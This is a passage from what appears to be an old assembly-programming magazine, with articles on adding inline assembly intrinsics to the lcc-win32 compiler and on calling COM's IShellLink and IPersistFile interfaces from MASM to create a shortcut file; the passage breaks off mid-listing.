            [distributed with Ralf Brown's Interrupt list]
         cpu.asm                                (Robert Mashlan)
         WHATCPU.ASM                            (Dave M. Walker)
         COMPTEST 2.60                          (Norbert Juffa)
         Ralf Brown's Interrupt List:
http://www.cs.cmu.edu/~ralf/files.html

This,  in addition to the ones already  referenced in the first article of
this
series.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                      The LCC Intrinsics
Utility
                                                                     Jacob
Navia


Lcc-win32 is a free C compiler system. It features an IDE, a resource
compiler,
a linker, librarian, a windowed debugger, and other goodies.

Here, I would like to describe a special feature of lcc-win32 that will be
surely appreciated by the colleagues that use assembly.

Lcc-win32 understands special macro definitions called intrinsics.This
constructs will be seen as normal function calls by the front end of the
compiler, but will be inline expanded by the back-end.

You can add your own intrinsic macros to the system, allowing you to use the
power and speed of assembly language within the context of a more powerful
and
safer high level language.

I will present here two examples, to give you an idea of how this can look
like.
You will need the source code of lcc-win32, that can be obtained at the home
page: http://ps.qss.cz/lcc or ftp://ftp.cs.virginia.edu/pub/lcc-win32

Inlining the strlen function
----------------------------
Lets assume the strlen function of the C library is just to slow for you.
Instead of generating:
      pushl     Arg
      call _strlen
      addl $4,%esp

you would like to generate inline the following code:
; Inlined strlen. The input argument is in ECX and points to the
; character string
      orl     $-1,%eax
loop:
      inc     %eax
      cmpb    $0,(%ecx,%eax)
      jnz     loop

This function then, should be inlined by the compiler. The C interface would
be:
      _strlen(str);

The prototype must be:

extern _stdcall _strlen(char *);

The compiler recognizes intrinsic macros because they have an underscore as
the
first character of their names, they are declared _stdcall, and they appear
in
the intrinsics table.  Functions that begin with an underscore are few, and
this
avoids looking up the intrinsics table for each function call, what would
slow
down compilation speed.

You take then the file intrin.c, in the sources of lcc-win32 and modify the
intrinsics table. Its declaration is in the middle of the file, and looks
like
this:


static INTRINSICS intrinsicTable[] = {
      {"_fsincos",2, 0,             fsincos,  NULL      },
      {"_bswap",     1,   0,        bswap,    bswapArgs },

     ... many declarations omitted ...

      {"_reduceLtb",3,    0,        redCmpLtb,     paddArgs  },
      {"_mmxDotProduct",3,0,             mmxDotProd,    paddArgs  },
      {"_emms",0,         0,        emms,          NULL      },
      {NULL,         0,   0,        0,             0    }
};


You add before the last line, the following line:

      {"_strlen",1,       0,        strlenGen,     strlenArgs     },

telling the system that you want an intrinsic called _strlen, that takes one
argument, whose code will be generated by the function strlenGen(), and the
arguments assigned to their respective registers in the function
strlenArgs().
This functions should assign the registers in which you want the arguments
to
the inline macro, and generate the code for the body of the macro.
Basically,
this macros are seen as special calls by the compiler, that instead of
generating a push instruction, will call your <arguments> function, that
should
set the right fields in each node passed to it, to make later the code
generator
generate a move to the registers specified.

Note that all intrinsics should start with an underscore to avoid
conflicting
with user space names.

When a call to this function is detected by the compiler, you will first be
called when pushing the arguments at each call site.  Here is the function
strlenArgs() then:

static Symbol strlenArgs(Node p)
{
      Symbol r=NULL;

      //The global ArgumentsIndex is zero before each call. The compiler
      //takes care of that.
      switch (ArgumentsIndex) {
      case 0: // First argument pushed, from right to left!
           if (p->x.nestedCall == 0) {
                Symbol w;
                r = SetRegister(p,intreg[ECX]);
           }
           break;
      }
      // We have seen another argument
      ArgumentsIndex++;
      // Assign the register to this expression.
      if (p->x.nestedCall == 0 && r)
           p->syms[2] = r;
      // Should never be more than  one arguments
      if (ArgumentsIndex == 1)
           ArgumentsIndex = 0;
      return r;
}

You see that in several places we have the test:

      if (p->x.nestedCall == 0)

This means that we should check if we have a nested call sequence within the
arguments, i.e. the following C expression:

      strlen( SomeFunction() );

True, in the case of strlen this doesnt change anything important, the
result
of the function will be in EAX anyway. But suppose you defined a macro that
takes two arguments, say, some special form of addition sadd(a,b).
In this case we would assign the second argument (from left to right) to
ECX,
and the first to EAX. Consider then the case of:

      sadd( SomeFunction(),5);

If we would just assign 5 to ECX, then the call to SomeFunction(), would
destroy the contents of ECX during the call!

This means that when the compiler detects a call within argument passing,
all
arguments WILL BE in the stack, and our code generating function should take
care of popping them into the right registers before proceeding.

In the case of strlen this can really hardly happen, but its important to
see
how this would work in the general case.

Note too that the argument function should increase the global argument
counter
for each argument, and reset it to zero when its done. Again, this is not
necessary for strlen, but for macros that take more arguments this should be
done imperatively.

The SetRegister function takes care of the details of assigning a register.
Here is its short body:

Symbol SetRegister(Node p,Symbol r)
{
      Symbol w;

      w = p->kids[0]->syms[2];
      if (w->x.regnode == NULL || w->x.regnode->vbl == NULL)
           p->kids[0]->syms[2] = r;
      return r;
}

This function tests that in the given node, the left child isn't already
assigned to a register. It will assign the register only if this is not the
case. Otherwise, the compiler will generate the move.

We come now to the center of the routine: Generating code for the strlen
utility.

static Symbol strlenGen(Node p)
{
          static int labelCount;

      // OK, the first thing to do is to see if we should pop our arguments.
      // If that is the case, pop them into the right registers.
      if (p->x.nestedCall) {
           print("\tpopl\t%%ecx\n");
      }
/*
Here we generate the code for the strlen routine. Note that the % sign is
used
by the assembler of lcc-win32 to mark a register keyword, but our print()
function uses it too to mark (as printf) the beginning of an argument. We
must
double them to get around this collision.

1) Set the counter to minus one
*/
         print("\torl\t$-1,%%eax\n");
/*
2) We should generate the label for this instance. All labels must be
unique,
and the easiest way to ensure that we always generate a new label is to
number
them consecutively using a counter. To avoid colliding with other labels, we
use a unique prefix too.
*/
      print("_$strlen%d:\n",labelCount);
/*
3) Now we generate the code for the body of the loop searching for the
character zero.
*/
      print("\tinc\t%%eax\n");
/* 4) Note the dollar before the immediate constant.*/
      print("\tcmpb\t$0,(%%ecx,%%eax)\n");
/*
5) We generate the jump, incrementing our loop counter afterwards
*/
      print("\tjnz\t_$strlen%d\n",labelCount++);

/*
Now we are done, the result is in eax, as it should. We finish our function.
Note that no pops are needed, since the ones we did at the beginning
(eventually) are just to compensate for the pushs the compiler generated.
Note too that we shouldn't insert a return statement since this is a macro
that shouldn't cause the current function to return!
*/
}

We compile the compiler, and we obtain a new compiler that will recognize
the
macro we have just created. Compiling the compiler with itself is a good
test
for your new function of course. This should be done at least three times to
be sure that your function is working OK.

Register assignments
--------------------
In general, you can use ECX, EDX, and EAX as you wish. The contents of EBX,
ESI, EBP and EDI should always be saved. If you destroy them unpredictable
results will surely occur.

Lets write a test function for our new compiler:

#include <stdio.h>
#ifdef MACRO
int _stdcall _strlen(char *);
#define strlen _strlen
#else
int strlen(char *);
#endif
int main(int argc, char *argv[])
{
         if (argc > 1)
                 printf("Length of \"%s\" is %d\n", argv[1],
                         strlen(argv[1]));
         return 0;
}

In the C source, we use the conditional MACRO to signify if we should use
our
macro, or just generate a call to the normal strlen procedure for comparison
purposes. We compile this with our new compiler, and add the S parameter to
see
what is generating.

lcc -S DMACRO tstrlen.c

The assembly (that the compiler writes in tstrlen.asm) is then:

_main:
         pushl   %ebp
         movl    %esp,%ebp
         pushl   %edi
         .line   9
         .line   10
         cmpl    $1,8(%ebp)
         jle     _$2
         .line   11
         movl    12(%ebp),%edi
; Our argument gets assigned to ECX, as our strlenArgs function
; defined
         movl    4(%edi),%ecx
; Here is the begin of our macro body
         orl     $-1,%eax
; This is our generated label
_$strlen0:
         inc     %eax
         cmpb    $0,(%ecx,%eax)
         jnz     _$strlen0
; Our macro ends here, leaving its results in EAX
         pushl   %eax
         movl    12(%ebp),%edi
         pushl   4(%edi)
         pushl   $_$4
         call    _printf
         addl    $12,%esp
_$2:
         .line   12
         xor     %eax,%eax
         .line   13
         popl    %edi
         popl    %ebp
         ret

We see that there is absolutely no call overhead. The arguments are assigned
to
the right registers in our function strlenArgs, and the body is expanded
in-line by strlenGen.

Next, we link our executable:

D:\lcc\src74\test>lcclnk tstrlen.obj

And we run a test:

D:\lcc\src74\test>tstrlen abcde
The length of "abcde" is 5
D:\lcc\src74\test>

Here is the strlenGen() function again for clarity.

static void strlenGen(Node p)
{
      static int labelCount;

      if (p->x.nestedCall) {
           print("\tpopl\t%%ecx\n");
      }
      print("\torl\t$-1,%%eax\n");
      print("_$strlen%d:\n",labelCount);
      print("\tinc\t%%eax\n");
      print("\tcmpb\t$0,(%%ecx,%%eax)\n");
      print("\tjnz\t_$strlen%d\n",labelCount++);
}

Another example: inlining the strchr function
---------------------------------------------
To demonstrate a function with two arguments, we inline the strchr function.
This function should return a pointer to the first occurrence of the given
character in a string, or NULL, if the character doesnt appear in the
string.
The implementation could be like this :

_strchr:
      movb (%eax),%dl          // read a character
      cmpb %cl,%dl             // compare it to searched for char
      je   _strchrexit              // exit if found with pointer to char as
result
      incl %eax           // move pointer to next char
      orb  %dl,%dl                  // test for end of string
      jne  strchr                   // if not zero continue loop
      xorl %eax,%eax      // Not found. Zero result
strchrexit :

We just scan the characters looking for either zero (end of the string) or
the
given char. The pointer to the string will be in EAX, and the character to
be
searched for will be in ECX. We use EDX as a scratch register.

The next step is then, to write the strchr function for assigning the
arguments.
Here it is :

static Symbol strchrArgs(Node p)
{
      Symbol r=NULL;

      switch (ArgumentsIndex) {
      case 0: // First argument (from right to left) char to be searched.
                 // We put it in ECX
           if (p->x.nestedCall == 0) {
                r = SetRegister(p,intreg[ECX]);
           }
           break;
      case 1: // Second argument: pointer to the string. We put it in EAX
           if (p->x.nestedCall == 0) {
                r = SetRegister(p,intreg[EAX]);
           }
           break;
      }
      ArgumentsIndex++;
      if (p->x.nestedCall == 0)
           p->syms[2] = r;
      if (ArgumentsIndex == 2)
           ArgumentsIndex = 0;
      return r;
}

The next step is finally to write the generating function. Here it is; note
that we need two labels:

static void strchrGen(Node p)
{
      static int labelCount;

      if (p->x.nestedCall) {
           print("\tpopl\t%%ecx\n");
      }
      print("_$strchr%d:\n",labelCount);
      print("\tmovb\t(%%eax),%%dl\n");
      print("\tcmpb\t%%cl,%%dl\n");
      print("\tje\t_$strchr%d\n",labelCount+1);
      print("\tinc\t%%eax\n");
      print("\torb\t%%dl,%%dl\n");
      print("\tjne\t_$strchr%d\n",labelCount);
      print("\txorl\t%%eax,%%eax\n");
      print("_$strchr%d:\n",labelCount+1);
      labelCount += 2;
}


This facility is not very common in a compiler system, and it allows you to
use assembly language in the routines that are *really* needed in a software
system, leaving to the compiler the tedious work of generating the assembly
for you in the 90% of the code where speed is not so important after all.

Another benefit is that you can't do simple mistakes when passing arguments
to your assembler macros since they are understood as function calls by the
compiler, and all prototype checking is done by the front end. If you
attempt
to use the strchr macro like this:
      strchr('\n",string);
the compiler will issue an error.


The lcc-win32 system can be downloaded free of charge from
     http://ps.qss.cz/lcc



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                             Accessing COM Objects from
Assembly
                                             by Ernest Murphy


Abstract
--------
The COM (Component Object Model) is used by the Windows Operation system in
increasing ways. For example, the shell.dll uses COM to access some of its
API
methods. The IShellLink and IPersistFile interfaces of the shell32.dll will
be
demonstrated to create a shortcut shell link. A basic understanding of COM
is
assumed. The code sample included is MASM specific.


Introduction
------------
   COM may seem complicated with its numerous details, but in use these
complications disappear into simple function calls. The hardest part is
understanding the data structures involved so you can define the
interfaces.

   I apologize for all the C++ terminology used in here. While COM is
implementation neutral, it borrows much terminology from C++ to define
itself.

   In order to use the COM methods of some object, you must first instance or
create that object from its coclass, then ask it to return you a pointer to
it's interface. This process is performed by the API function
CoCreateInstance.
When you are done with the interface you call it's Release method, and COM
and
the coclass will take care of unloading the coclass.

Assessing COM Methods
---------------------
   To use COM methods you need to know before hand what the interface looks
like. Even if you "late bind" through an IDispatch interface, you still need
to know what IDispatch looks like.

   An COM interface is just table of pointers to functions. Let's start with
the IUnknown interface. If you were to create a component that simply
exports
the IUnknown interface, you have a fully functional COM object (albeit on
the
level of "Hello World"). IUnknown has the 3 basic methods of every
interface,
since all interfaces inherit from IUnknown. Keep in mind all an interface
consists of is a structure of function pointers. For IUnknown, it looks like
this:

IUnknown                STRUCT DWORD
     ; IUnknown methods
     QueryInterface                  IUnknown_QueryInterface
?
     AddRef                          IUnknown_AddRef
?
     Release                         IUnknown_Release
?
IUnknown                ENDS

   That's it, just 12 bytes long. It holds 3 DWORD pointers to the procedures
that actually implement the methods. It is the infamous "vtable" you may
have
heard of. The pointers are defined as such so we can have MASM do some type
checking for us when compiling our calls.

   Since the vtable holds the addresses of functions, or pointers, these
pointers
are typedefed in our interface definition as such:

IUnknown_QueryInterface                 typedef ptr
IUnknown_QueryInterfaceProto
IUnknown_AddRef                         typedef ptr IUnknown_AddRefProto
IUnknown_Release                        typedef ptr IUnknown_ReleaseProto

   Finally, we define the function prototypes as follows:

IUnknown_QueryInterfaceProto            typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto                    typedef PROTO :DWORD
IUnknown_ReleaseProto                   typedef PROTO :DWORD

   In keeping with the MASM32 practice of "loose" type checking, function
parameters are just defined as DWORDs. Lots of work to set things up, but it
does keeps lots of errors confined to compile time, not run time. In
practice,
you can wrap up your interface definitions in include files and keep them
from cluttering up your source code.

   One rather big compilation on defining an interface: MASM cannot resolve
forward references like this, so we have to define them backwards, by
defining
the function prototype typedefs first, and the interface table last. The
sample
program later on defines the interfaces this way.

   To actually use an interface, you need a pointer to it. The
CoCreateInstance
API can be used to return us this indirect pointer to an interface
structure.
It is one level removed from the vtable itself, and actually points to the
"object" that holds the interface. (This would be clearer had I been
creating
the interface instead of using one. Please wait for a future article for
that).
The place this pointer points to in the object points to the interface
structure. Thus, this pointer is generically named "ppv", for "pointer to
pointer to (void)," where (void) means an unspecified type.

   For example, say we used CoCreateInstance and successfully got an
interface
pointer ppv, and wanted to see if it supports some other interface. We can
call
its QueryInterface method and request a  new ppv to the other interface we
are
interested in. Such a call would look like this:

mov eax, ppv            ; get pointer to the object
mov edx, [eax]          ; and use it to find the interface structure
                     ; and then call that method
invoke (IUnknown PTR [edx]).QueryInterface, ppv,
                         ADDR IID_SomeOtherInterface, ADDR ppv_new

   I hope you find this as wonderfully simple as I do. IID_SomeOtherInterface
holds the GUID of the interface we desire, and ppv_new is a new pointer we
can
use to access it. Also note we must pass in the pointer we used, this lets
the
interface know which object (literally "this" object) we are using.

   Incidentally, in a previous APJ article on COM, there was an error in how
a
COM interface is invoked. THIS was left out of the COM call. The program
seemed
to work, because the COM invoke was invoked from the main code, not from a
procedure, and did not require a return call before calling ExitProcess. Had
this COM invoke been done from a procedure, a stack error crash would have
resulted.

   Note the register must be type cast (IUnknown PTR [edx]). This lets
the compiler know what structure to use to get the correct offset in the
vtable
for the .QueryInterface function (in this case it means an offset of zero
from
edx). Actually, the information contained by the interface name and function
name called disappear at compile time, all that is left is a numeric offset
from an as of yet value unspecified pointer.

   We can simplify a COM invoke further with a macro:

     coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
         LOCAL istatement, arg
         ;; invokes an arbitrary COM interface
         ;; pInterface    pointer to a specific interface instance
         ;; Interface     the Interface's struct typedef
         ;; Function      which function or method of the interface to
perform
         ;; args          all required arguments
         ;;                   (type, kind and count determined by the
function)
         istatement TEXTEQU <invoke (Interface PTR[eax]).&Function,
pInterface>
         FOR arg, <args>
             ; build the list of parameter arguments
             istatement CATSTR istatement, <, >, <&arg>
         ENDM
         mov eax, pInterface
         mov eax, [eax]
         istatement
     ENDM

Thus, the same QueryInterface method as before can be invoked in a single
line:

     coinvoke ppv ,IUnknown, QueryInterface,
                         ADDR IID_SomeOtherInterface, ADDR ppnew

   The return parameter for every COM call is an hResult, a 4 byte return
value
in eax. It is used to signal success or failure. Since the most significant
digit is used to indicate failure, you can test the result with a simple:

     .IF !SIGN?
         ; function passed
     .ELSE
         ; function failed
     .ENDIF

   Again, this can be simplified with some more simple macros:

     SUCCEEDED    TEXTEQU     <!!SIGN?>
     FAILED      TEXTEQU     <!!SUCCEEDED>

   (The not ! sign must be doubled since that symbol has special meaning in
MASM macros)

   That's about all you need to fully invoke and use interfaces from COM
objects
from assembly. These techniques work with any COM or activeX object.


Back to the Real Word: Using IShellFile and IPersistFile from shell32.dll
-------------------------------------------------------------------------
The shell32.dll provides a simple, easy way to make shell links (shortcuts).
However, it uses a COM interface to provide this service. The sample below
is
based on the MSDN "Shell Links" section for "Internet Tools and
Technologies."
This may be a strange place to find documentation, but there it is.

The "Shell Links" article may be found at
http://msdn.microsoft.com/library/psdk/shellcc/shell/Shortcut.htm

For this tutorial we will access the following members of the IShellLink and
the IPersistFile interfaces. Note every interface includes a "ppi" interface
parameter, this is the interface that we calling to (it is the THIS
parameter).
(The following interface information is a copy of information published
by Microsoft)


IShellLink::QueryInterface, ppi, ADDR riid, ADDR ppv
* riid: The identifier of the interface requested. To get access to the
* ppv: The pointer to the variable that receives the interface.
Description: Checks if the object also supports the requested interface. If
so,
assigns the ppv pointer with the interface's pointer.

IShellLink::Release, ppi
Description: Decrements the reference count on the IShellLink interface.

IShellLink:: SetPath, ppi, ADDR szFile
* pszFile: A pointer to a text buffer containing the new path for the shell
link object.
Description: Defines where the file the shell link points to.

IShellLink::SetIconLocation, ppi, ADDR szIconPath, iIcon
* pszIconPath: A pointer to a text buffer containing the new icon path.
* iIcon: An index to the icon. This index is zero based.
Description: Sets which icon the shelllink will use.

IPersistFile::Save, ppi, ADDR szFileName, fRemember
* pszFileName: Points to a zero-terminated string containing the absolute
path
of the file to which the object should be saved.
* fRemember: Indicates whether the pszFileName parameter is to be used as
the
current working file. If TRUE, pszFileName becomes the current file and the
object should clear its dirty flag after the save. If FALSE, this save
operation is a "Save A Copy As ..." operation. In this case, the current
file
is unchanged and the object should not clear its dirty flag. If pszFileName
is
NULL, the implementation should ignore the fRemember flag.
Description: Perform a save operation for the ShellLink object, or saves the
shell link are creating.

IPersistFile::Release, ppi
Description: Decrements the reference count on the IPersistFile interface.

   These interfaces contain many many more methods (see the full interface
definitions in the code below), but we only need concentrate on those we
will
actually be using.

   A shell link is the MS-speak name for a shortcut icon. The information
contained in a link (.lnk) file is:

      1 - The file path and name of the program to shell.

     2 - Where to obtain the icon to display for the shortcut (usually from
the
           executable itself), and which icon in that file to use. We will
use
           the first icon in the file

      3 - A file path and name where the shortcut should be stored.

   The use of these interfaces is simple and straightforward. It goes like
this:

      * Call CoCreateInstance CLSID_ShellLink for a IID_IShellLink interface
      * Queryinterface IShellLink for an IID_IPersistFile interface.
      * Call IShellLink.SetPath to specify where the shortcut target is
      * Call IShellLink.SetIconLocation to specify which icon to use
      * Call IPersistFile.Save to save our new shortcut .lnk file.
      * Call IPersistFile.Release
      * Call IShellLink.Release

   The last two steps will releases our hold on these interfaces,  which will
automatically lead to the dll that supplied them being unloaded.

   Again, the hard part in this application was finding documentation. What
finally found broke the search open was using Visual Studio "Search in
Files"
to find "IShellLink" and " IPersistFile" in the /include area of MSVC. This
lead me to various .h files, from which I hand translated the interfaces
from C
to MASM.

   Another handy tool I could have used is the command line app
"FindGUID.exe,"
which looks through the registry for a specific interface name or coclass,
or
will output a list of every class and interface with their associated GUIDs.
Finally, the OLEView.exe application will let you browse the registry type
libraries and mine them for information. However, these tools come with MSVC
and are proprietary.

   Take care when defining an interface. Missing vtable methods lead to
strange
results. Essentially COM calls, on one level, amount to "perform function
(number)" calls. Leave a method out of the vtable definition and you call
the
wrong interface. The original IShellLink interface definition I used from a
inc
file I downloaded had a missing function. The calls I made generated a
"SUCEEDED" hResult, but in some cases would not properly clean the stack
(since
my push count did not match the invoked function's pop count), thus lead to
a
GPF as I exited a procedure. Keep this in mind if you ever get similar
"weird" results.


MakeLink.asm, a demonstration of COM
------------------------------------
   This program does very little, as all good tutorial programs should. When
run, it creates a shortcut to itself, in the same directory. It can be
amusing
to run from file explorer and watch the shortcut appear. Then you can try
the
shortcut and watch it's creation time change.

   The shell link tutorial code follows. It begins with some "hack code" to
get the full file name path of the executable, and also makes a string with
the same path that changes the file to "Shortcut To ShellLink.lnk" These
strings are passed to the shell link interface, and it is saved (or
persisted in COM-speak).

   The CoCreateLink procedure used to actually perform the COM methods and
perform this link creation has been kept as general as possible, and may
have reuse possibilities in other applications.


;---------------------------------------------------------------------
; MakeLink.asm ActiveX simple client to demonstrate basic concepts
;               written & (c) copyright April 5, 2000 by Ernest Murphy
;
;               contact the author at ernie@...
;
;               may be reused for any educational or
;               non-commercial application without further license
;---------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none


include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ole32.lib

;---------------------------------------------------------------------
CoCreateLink      PROTO :DWORD, :DWORD

;---------------------------------------------------------------------
; Interface definitions

; IUnknown Interface
IUnknown_QueryInterfaceProto            typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto                    typedef PROTO :DWORD
IUnknown_ReleaseProto                   typedef PROTO :DWORD

IUnknown_QueryInterface                 typedef ptr
IUnknown_QueryInterfaceProto
IUnknown_AddRef                         typedef ptr IUnknown_AddRefProto
IUnknown_Release                        typedef ptr IUnknown_ReleaseProto

IUnknown                STRUCT DWORD
     ; IUnknown methods
     QueryInterface                      IUnknown_QueryInterface
?
     AddRef                              IUnknown_AddRef
?
     Release                             IUnknown_Release
?
IUnknown                ENDS


; IShellLink Interface
IShellLink_IShellLink_GetPathProto  typedef PROTO :DWORD, :DWORD, :DWORD,
:DWORD, :DWORD
IShellLink_GetIDListProto              typedef PROTO :DWORD, :DWORD
IShellLink_SetIDListProto              typedef PROTO :DWORD, :DWORD
IShellLink_GetDescriptionProto      typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetDescriptionProto      typedef PROTO :DWORD, :DWORD
IShellLink_GetWorkingDirectoryProto     typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetWorkingDirectoryProto     typedef PROTO :DWORD, :DWORD
IShellLink_GetArgumentsProto       typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetArgumentsProto       typedef PROTO :DWORD, :DWORD
IShellLink_GetHotkeyProto           typedef PROTO :DWORD, :DWORD
IShellLink_SetHotkeyProto           typedef PROTO :DWORD, :WORD
IShellLink_GetShowCmdProto          typedef PROTO :DWORD, :DWORD
IShellLink_SetShowCmdProto          typedef PROTO :DWORD, :DWORD
IShellLink_GetIconLocationProto     typedef PROTO :DWORD, :DWORD, :DWORD,
:DWORD
IShellLink_SetIconLocationProto     typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetRelativePathProto     typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_ResolveProto             typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetPathProto             typedef PROTO :DWORD, :DWORD

IShellLink_GetPath              typedef ptr
IShellLink_IShellLink_GetPathProto
IShellLink_GetIDList            typedef ptr IShellLink_GetIDListProto
IShellLink_SetIDList            typedef ptr IShellLink_SetIDListProto
IShellLink_GetDescription       typedef ptr IShellLink_GetDescriptionProto
IShellLink_SetDescription       typedef ptr IShellLink_SetDescriptionProto
IShellLink_GetWorkingDirectory  typedef ptr
IShellLink_GetWorkingDirectoryProto
IShellLink_SetWorkingDirectory  typedef ptr
IShellLink_SetWorkingDirectoryProto
IShellLink_GetArguments         typedef ptr IShellLink_GetArgumentsProto
IShellLink_SetArguments         typedef ptr IShellLink_SetArgumentsProto
IShellLink_GetHotkey            typedef ptr IShellLink_GetHotkeyProto
IShellLink_SetHotkey            typedef ptr IShellLink_SetHotkeyProto
IShellLink_GetShowCmd           typedef ptr IShellLink_GetShowCmdProto
IShellLink_SetShowCmd           typedef ptr IShellLink_SetShowCmdProto
IShellLink_GetIconLocation      typedef ptr IShellLink_GetIconLocationProto
IShellLink_SetIconLocation      typedef ptr IShellLink_SetIconLocationProto
IShellLink_SetRelativePath      typedef ptr IShellLink_SetRelativePathProto
IShellLink_Resolve              typedef ptr IShellLink_ResolveProto
IShellLink_SetPath              typedef ptr IShellLink_SetPathProto

IShellLink              STRUCT DWORD
     QueryInterface                      IUnknown_QueryInterface
?
     AddRef                              IUnknown_AddRef
?
     Release                             IUnknown_Release
?
     GetPath                             IShellLink_GetPath
?
     GetIDList                           IShellLink_GetIDList
?
     SetIDList                           IShellLink_SetIDList
?
     GetDescription                      IShellLink_GetDescription
?
     SetDescription                      IShellLink_SetDescription
?
     GetWorkingDirectory                 IShellLink_GetWorkingDirectory
?
     SetWorkingDirectory                 IShellLink_SetWorkingDirectory
?
     GetArguments                        IShellLink_GetArguments
?
     SetArguments                        IShellLink_SetArguments
?
     GetHotkey                           IShellLink_GetHotkey
?
     SetHotkey                           IShellLink_SetHotkey
?
     GetShowCmd                          IShellLink_GetShowCmd
?
     SetShowCmd                          IShellLink_SetShowCmd
?
     GetIconLocation                     IShellLink_GetIconLocation
?
     SetIconLocation                     IShellLink_SetIconLocation
?
     SetRelativePath                     IShellLink_SetRelativePath
?
     Resolve                             IShellLink_Resolve
?
     SetPath                             IShellLink_SetPath
?
IShellLink              ENDS

; IPersistFile Interface
IPersistFile_GetClassIDProto        typedef PROTO :DWORD, :DWORD
IPersistFile_IsDirtyProto           typedef PROTO :DWORD
IPersistFile_LoadProto              typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveProto              typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveCompletedProto     typedef PROTO :DWORD, :DWORD
IPersistFile_GetCurFileProto        typedef PROTO :DWORD, :DWORD
IPersistFile_GetClassID             typedef ptr IPersistFile_GetClassIDProto
IPersistFile_IsDirty                typedef ptr IPersistFile_IsDirtyProto
IPersistFile_Load                   typedef ptr IPersistFile_LoadProto
IPersistFile_Save                   typedef ptr IPersistFile_SaveProto
IPersistFile_SaveCompleted          typedef ptr
IPersistFile_SaveCompletedProto
IPersistFile_GetCurFile             typedef ptr IPersistFile_GetCurFileProto

IPersistFile            STRUCT DWORD
      QueryInterface                  IUnknown_QueryInterface         ?
      AddRef                          IUnknown_AddRef                  ?
      Release                         IUnknown_Release            ?
      GetClassID                      IPersistFile_GetClassID         ?
      IsDirty                         IPersistFile_IsDirty            ?
      Load                            IPersistFile_Load               ?
      Save                            IPersistFile_Save               ?
      SaveCompleted                   IPersistFile_SaveCompleted      ?
      GetCurFile                      IPersistFile_GetCurFile         ?
IPersistFile            ENDS

;---------------------------------------------------------------------
coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
     LOCAL istatement, arg
     ;; invokes an arbitrary COM interface
     ;; pInterface    pointer to a specific interface instance
     ;; Interface     the Interface's struct typedef
     ;; Function      which function or method of the interface to perform
     ;; args          all required arguments
     ;;                   (type, kind and count determined by the function)
     istatement TEXTEQU <invoke (Interface PTR[eax]).&Function, pInterface>
     FOR arg, <args>
         ; build the list of parameter arguments
         istatement CATSTR istatement, <, >, <&arg>
     ENDM
     mov eax, pInterface
     mov eax, [eax]
     istatement
ENDM

; equate primitives
SUCEEDED    TEXTEQU     <!!SIGN?>
FAILED      TEXTEQU     <!!SUCEEDED>

MakeMessage MACRO Text:REQ
     ; macro to display a message box
     ; the text to display is kept local to
     ; this routine for ease of use
     LOCAL lbl
     LOCAL sztext
     jmp lbl
sztext:
     db Text,0
lbl:
     invoke MessageBox,NULL,sztext,ADDR szAppName,MB_OK
     ENDM

;---------------------------------------------------------------------
.data

szAppName         BYTE        "Shell Link Maker", 0

szLinkName        BYTE        "Shortcut to MakeLink.lnk", 0
szBKSlash             BYTE         "\", 0

hInstance         HINSTANCE   ?
Pos               DWORD       ?

szBuffer1           BYTE           MAX_PATH DUP(?)
szBuffer2           BYTE           MAX_PATH DUP(?)

;-----------------------------------------------------------------------
.code
start:

;---------------------------------------------
;  this bracketed code is just a 'quick hack'
;  to replace the filename from the filepathname
;  with the 'Shortcut to' title
;
     invoke GetModuleHandle, NULL
mov hInstance, eax
     invoke GetModuleFileName, NULL, ADDR szBuffer1, MAX_PATH
     invoke lstrcpy, ADDR szBuffer2, ADDR szBuffer1
     ; Find the last backslash '\' and change it to zero
     mov edx, OFFSET szBuffer2
     mov ecx, edx
     .REPEAT
         mov al, BYTE PTR [edx]
         .IF al == 92 ; "\"
             mov ecx, edx
         .ENDIF
         inc edx
     .UNTIL  al == 0
     mov BYTE PTR [ecx+1], 0
     invoke lstrcpy, ADDR szBuffer2, ADDR szLinkName
;----------------------------------------------

; here is where we call the proc with the COM methods
     invoke CoInitialize, NULL
     MakeMessage "Let's try our Createlink."
     invoke CoCreateLink, ADDR szBuffer1, ADDR szBuffer2
     MakeMessage "That's all folks !!!"
     invoke CoUninitialize
invoke ExitProcess, NULL

;-----------------------------------------------------------------------
CoCreateLink PROC pszPathObj:DWORD, pszPathLink:DWORD
; CreateLink - uses the shell's IShellLink and IPersistFile interfaces
;   to create and store a shortcut to the specified object.
; Returns the hresult of calling the member functions of the interfaces.
; pszPathObj - address of a buffer containing the path of the object.
; pszPathLink - address of a buffer containing the path where the
;   shell link is to be stored.
; adapted from MSDN article "Shell Links"
;  deleted useless "description" method
;  added set icon location method

     LOCAL   pwsz    :DWORD
     LOCAL   psl     :DWORD
     LOCAL   ppsl    :DWORD
     LOCAL   ppf     :DWORD
     LOCAL   pppf    :DWORD
     LOCAL   hResult :DWORD
     LOCAL   hHeap   :DWORD

.data
CLSID_ShellLink     GUID        <0021401H, 0000H, 0000H,                  \
                                 <0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IShellLink      GUID        <00214EEH, 0000H, 0000H,                  \
                                 <0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IPersistFile    GUID        <000010BH, 0000H, 0000H,                  \
                                 <0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>

.code
     ; first, get some heap for a wide buffer
